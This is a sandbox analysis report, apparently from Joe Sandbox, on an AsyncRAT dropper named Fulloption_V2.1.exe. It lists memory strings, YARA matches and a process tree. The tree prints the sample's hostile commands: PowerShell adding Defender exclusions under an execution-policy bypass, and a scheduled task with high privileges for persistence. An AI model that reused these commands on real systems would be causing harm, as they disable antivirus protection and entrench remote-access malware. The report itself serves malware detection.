                        Source: powershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
                        Source: svchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.0000000003362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: Fulloption_V2.1.exe, 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.3.dr, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: svchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: FullOption_2.1Xenos.exe.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000004.00000002.2258983299.0000022B6E970000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2361653227.000001F842573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                        Source: powershell.exe, 0000000F.00000002.2735931313.00000164F0B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                        Source: powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: FullOption_2.1Xenos.exe.0.drString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                        Source: powershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: FullOption_2.1Xenos.exe.0.drString found in binary or memory: https://scripts.sil.org/OFLThis
                        Source: FullOption_2.1Xenos.exe.0.drString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                        Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.7ff6ae6d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.FullOption_2.1Xenos.exe.7ff6ae6d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000000.2149098147.00007FF6AE88B000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe, type: DROPPED

                        Operating System Destruction

                        barindex
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\ProgramData\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6DC3C02_2_00007FF6AE6DC3C0
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6D98402_2_00007FF6AE6D9840
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6E61602_2_00007FF6AE6E6160
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6D89602_2_00007FF6AE6D8960
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6F31502_2_00007FF6AE6F3150
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6FB9402_2_00007FF6AE6FB940
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6D8A302_2_00007FF6AE6D8A30
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6DE2002_2_00007FF6AE6DE200
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD348860C63_2_00007FFD348860C6
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD348817193_2_00007FFD34881719
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD34886E723_2_00007FFD34886E72
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD348812903_2_00007FFD34881290
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD348820F13_2_00007FFD348820F1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD3488A9983_2_00007FFD3488A998
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD348810A53_2_00007FFD348810A5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD348B5EFA4_2_00007FFD348B5EFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD349830E94_2_00007FFD349830E9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34898F2A7_2_00007FFD34898F2A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349630E97_2_00007FFD349630E9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B278512_2_00007FFD348B2785
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD349830E912_2_00007FFD349830E9
                        Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348C171919_2_00007FFD348C1719
                        Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348C20F119_2_00007FFD348C20F1
                        Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348C103819_2_00007FFD348C1038
                        Source: C:\ProgramData\svchost.exeCode function: 20_2_00007FFD3489171920_2_00007FFD34891719
                        Source: C:\ProgramData\svchost.exeCode function: 20_2_00007FFD348920F120_2_00007FFD348920F1
                        Source: C:\ProgramData\svchost.exeCode function: 20_2_00007FFD3489103820_2_00007FFD34891038
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe 122E3CB0F2AD233D1A364911D433667E7778F00D9A7D10B954C994F4E8093D1F
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: String function: 00007FF6AE82D040 appears 57 times
                        Source: Fulloption_V2.1.exe, 00000000.00000000.2141314743.0000000000F75000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs Fulloption_V2.1.exe
                        Source: Fulloption_V2.1.exe, 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe4 vs Fulloption_V2.1.exe
                        Source: Fulloption_V2.1.exeBinary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs Fulloption_V2.1.exe
                        Source: Fulloption_V2.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\ProgramData\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: svchost.exe.0.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.3.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@22/24@1/2
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6D1530 CreateToolhelp32Snapshot,Module32FirstW,_wcsicmp,Module32NextW,CloseHandle,2_2_00007FF6AE6D1530
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJump to behavior
                        Source: C:\ProgramData\svchost.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeMutant created: \Sessions\1\BaseNamedObjects\RXodfPcgOmzjDIlhm
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\tXSCfFOlESchkWrE
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                        Source: Fulloption_V2.1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Fulloption_V2.1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Fulloption_V2.1.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\Fulloption_V2.1.exe "C:\Users\user\Desktop\Fulloption_V2.1.exe"
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
                        Source: unknownProcess created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeSection loaded: d3d11.dllJump to behavior
